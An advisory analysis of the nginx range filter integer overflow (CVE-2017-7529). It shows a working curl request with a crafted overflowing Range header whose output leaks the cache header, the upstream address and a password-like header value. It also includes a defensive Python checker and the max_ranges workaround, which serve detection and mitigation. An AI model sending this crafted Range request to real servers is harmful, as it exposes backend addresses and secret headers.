Nginx Range Filter Integer Overflow Vulnerability (CVE-2017-7529): Advisory Analysis

1. Vulnerability description

When the standard nginx modules are in use and a response is served from the cache, an attacker can retrieve the header of the cache file. That header reveals the backend (upstream) server, including its IP address, and other sensitive information, resulting in information disclosure.

2. Reproducing the vulnerability

Preconditions
- Nginx version: 0.5.6 - 1.13.2
- Caching enabled
- A Range request header crafted so that the range arithmetic overflows a signed integer in a specific way

Reproduction steps
- nginx configuration as follows:

http {
    proxy_cache_path  /home/nginx/tmp_cache  levels=1:2 keys_zone=cache_one:200m inactive=3d max_size=30g;

    server {
        listen       80;

        location /proxy/ {
            proxy_pass http://127.0.0.1:8001/index.html;
            proxy_cache cache_one;
            add_header X-Proxy-Cache $upstream_cache_status;
            proxy_hide_header x-nos-passwd;
            proxy_cache_valid 200 302 24h;
            proxy_cache_valid any 5m;
            expires 90d;
        }
    }
}
- Determine the file length and get the file cached:
$ curl "127.0.0.1/proxy/" -I

HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Wed, 19 Jul 2017 06:07:49 GMT
Content-Type: text/html
Content-Length: 558
Connection: keep-alive
Last-Modified: Tue, 02 May 2017 02:31:11 GMT
ETag: "5907ef6f-22e"
Expires: Tue, 17 Oct 2017 06:07:49 GMT
Cache-Control: max-age=7776000
X-Proxy-Cache: MISS
Accept-Ranges: bytes
- Construct the overflowing Range:
1. The file length is 558.
2. Set the first range to -958: since 958 - 558 = 400, this reads the 400 bytes preceding the cached body, which hold the cache file header.
3. Set the second range to 0x8000000000000000 - 958 = 9223372036854774850, negated.
- Reproduce the bug:
$ curl -v "127.0.0.1/proxy/" -r -958,-9223372036854774850

* About to connect() to 127.0.0.1 port 80 (#0)
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> GET /proxy/ HTTP/1.1
> Range: bytes=-958,-9223372036854774850
> User-Agent: curl/7.29.0
> Host: 127.0.0.1
> Accept: */*
> 
< HTTP/1.1 206 Partial Content
< Server: nginx/1.7.10
< Date: Wed, 19 Jul 2017 06:23:14 GMT
< Content-Type: multipart/byteranges; boundary=00000000000000000569
< Connection: keep-alive
< Last-Modified: Tue, 02 May 2017 02:31:11 GMT
< ETag: "5907ef6f-22e"
< Expires: Tue, 17 Oct 2017 06:23:14 GMT
< Cache-Control: max-age=7776000
< X-Proxy-Cache: HIT
* no chunk, no close, no size. Assume close to signal end
< 

--00000000000000000569
Content-Type: text/html
Content-Range: bytes -400-557/558

22e"
KEY: http://127.0.0.1:8001/index.html
HTTP/1.1 200 OK
Server: openresty/1.11.2.2
Date: Wed, 19 Jul 2017 06:07:49 GMT
Content-Type: text/html
Content-Length: 558
Last-Modified: Tue, 02 May 2017 02:31:11 GMT
Connection: close
ETag: "5907ef6f-22e"
x-nos-passwd: chenjianfei
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>Welcome to OpenResty!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to OpenResty!</h1>
<p>If you see this page, the OpenResty web platform is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="https://openresty.org/">openresty.org</a>.<br/>

<p><em>Thank you for flying OpenResty.</em></p>
</body>
</html>

--00000000000000000569
Content-Type: text/html
Content-Range: bytes -9223372036854774292-557/558

* Closing connection 0

3. Impact

The request above exposes the following information:
- the upstream's real IP address and port (KEY: http://127.0.0.1:8001/index.html)
- the headers returned by the upstream (x-nos-passwd: chenjianfei, among others)

Only nginx instances of the affected versions that have caching enabled are impacted.
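The two Content-Range values in the output above show what the overflow does: each suffix range is longer than the 558-byte body, so its start resolves to a negative offset, and the two lengths add up to exactly 2^63, which wraps the signed 64-bit accumulator and defeats the "total larger than the body" check. The following checker, an added example that is not part of the original advisory or of nginx itself, resolves a Range header against a known content length the way the range filter does and flags the conditions a reverse proxy, WAF or log analyzer should reject: a suffix longer than the body, a range total that exceeds the signed 64-bit off_t, and more ranges than an assumed `max_ranges` limit. The header value is the one from the reproduction above; the other inputs are constructed.

```python
"""Flag Range headers exhibiting the CVE-2017-7529 overflow pattern.

Added example, not nginx code. Resolution of suffix ranges mirrors the
range filter's arithmetic (start = content_length - suffix, end = last byte)
but uses Python's unbounded integers, so the overflow becomes visible as
a total that no longer fits in a signed 64-bit off_t.
"""
import re
from dataclasses import dataclass, field

OFF_T_MAX = 2**63 - 1  # nginx accumulates range sizes in a signed 64-bit off_t

RANGE_HEADER = re.compile(r"\s*bytes\s*=\s*(.*)")
RANGE_SPEC = re.compile(r"(\d*)-(\d*)")


@dataclass
class RangeVerdict:
    ranges: list = field(default_factory=list)    # resolved (start, end) pairs, end inclusive
    problems: list = field(default_factory=list)  # human-readable reasons to reject

    @property
    def suspicious(self) -> bool:
        return bool(self.problems)


def check_range_header(value: str, content_length: int, max_ranges: int = 1) -> RangeVerdict:
    """Resolve a Range header and report conditions that should be rejected.

    max_ranges defaults to 1 (assumed policy, matching the `max_ranges 1;`
    workaround): a single range can never produce the overflowing sum.
    """
    verdict = RangeVerdict()
    m = RANGE_HEADER.fullmatch(value)
    if not m:
        verdict.problems.append("range unit is not 'bytes'")
        return verdict

    specs = [s.strip() for s in m.group(1).split(",") if s.strip()]
    if len(specs) > max_ranges:
        verdict.problems.append(f"{len(specs)} ranges exceed max_ranges={max_ranges}")

    total = 0
    for spec in specs:
        sm = RANGE_SPEC.fullmatch(spec)
        if not sm or (sm.group(1) == "" and sm.group(2) == ""):
            verdict.problems.append(f"malformed range spec {spec!r}")
            continue
        first, last = sm.group(1), sm.group(2)
        if first == "":
            # Suffix range "-N": the last N bytes. A suffix longer than the
            # body yields a negative start, which is how the cache header
            # stored in front of the body got exposed.
            suffix = int(last)
            if suffix > content_length:
                verdict.problems.append(
                    f"suffix length {suffix} exceeds content length {content_length}")
            start, end = content_length - suffix, content_length - 1
        else:
            start = int(first)
            end = int(last) if last else content_length - 1
            end = min(end, content_length - 1)
            if start > end:
                verdict.problems.append(f"unsatisfiable range {spec!r}")
                continue
        verdict.ranges.append((start, end))
        total += end - start + 1

    # In the vulnerable filter this sum silently wrapped negative and so
    # passed the "larger than the body" check; here it is caught explicitly.
    if total > OFF_T_MAX:
        verdict.problems.append("sum of range sizes overflows signed 64-bit off_t")
    return verdict


if __name__ == "__main__":
    # Header from the reproduction above; content length from its response.
    v = check_range_header("bytes=-958,-9223372036854774850", 558)
    for r in v.ranges:
        print("resolved range:", r)          # (-400, 557) and (-9223372036854774292, 557)
    for p in v.problems:
        print("problem:", p)
```

The resolved pairs reproduce the two `Content-Range` values the server emitted, which is a quick way to confirm the checker's arithmetic against a real response. To run it over traffic, add `$http_range` to an nginx `log_format` so the header is recorded, then feed each logged value and the response's `Content-Length` to `check_range_header`. On the server side, the `max_ranges 1;` directive of the range filter module is the configuration workaround for this issue, since a single range cannot produce the overflowing sum.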
